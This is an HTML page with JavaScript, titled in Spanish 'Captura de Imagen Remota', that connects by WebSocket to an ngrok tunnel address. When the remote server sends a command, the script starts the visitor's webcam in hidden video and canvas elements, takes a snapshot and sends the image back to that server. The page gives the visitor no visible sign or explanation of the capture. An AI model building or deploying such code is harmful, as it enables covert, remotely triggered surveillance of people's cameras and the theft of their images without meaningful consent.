<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Captura de Imagen Remota</title>
</head>
<body>
    <h1>Captura de Imagen Remota</h1>
    <video id="video" autoplay style="display: none;"></video>
    <canvas id="canvas" style="display: none;"></canvas>

    <script>
        //const socket = new WebSocket('ws://localhost:80/ws/capture/');
        const socket = new WebSocket('wss://b082-189-239-58-13.ngrok-free.app/ws/capture/');//Cambiar el url que Ngrot genera en cada rinicio de servidor

        socket.onopen = function(event) {
            console.log("Conectado al WebSocket:", event);
        };

        socket.onerror = function(error) {
            console.error("Error en WebSocket:", error);
        };

        socket.onmessage = function(event) {
            const data = JSON.parse(event.data);
            if (data.action === "capturar_imagen") {
                console.log("Iniciando captura de imagen...");
                activarCamaraYCapturarImagen();
            } else {
                console.log("Acción no reconocida:", data.action);
            }
        };

        function activarCamaraYCapturarImagen() {
            navigator.mediaDevices.getUserMedia({ video: true })
                .then(stream => {
                    const video = document.getElementById("video");
                    video.srcObject = stream;
                    video.onloadedmetadata = () => {
                        setTimeout(() => {
                            capturarImagen(stream);
                        }, 500);
                    };
                })
                .catch(error => {
                    console.error("Error al acceder a la cámara:", error);
                });
        }

        function capturarImagen(stream) {
            const video = document.getElementById("video");
            const canvas = document.getElementById("canvas");
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;

            const context = canvas.getContext("2d");
            context.drawImage(video, 0, 0, canvas.width, canvas.height);
            const imagenCapturada = canvas.toDataURL("image/png");

            enviarImagenAlServidor(imagenCapturada);
            stream.getTracks().forEach(track => track.stop());
        }

        function enviarImagenAlServidor(imagen) {
            const message = JSON.stringify({
                action: 'save_image',
                image: imagen
            });
            socket.send(message);
            console.log("Imagen enviada al servidor a través de WebSocket");
        }
    </script>
</body>
</html>
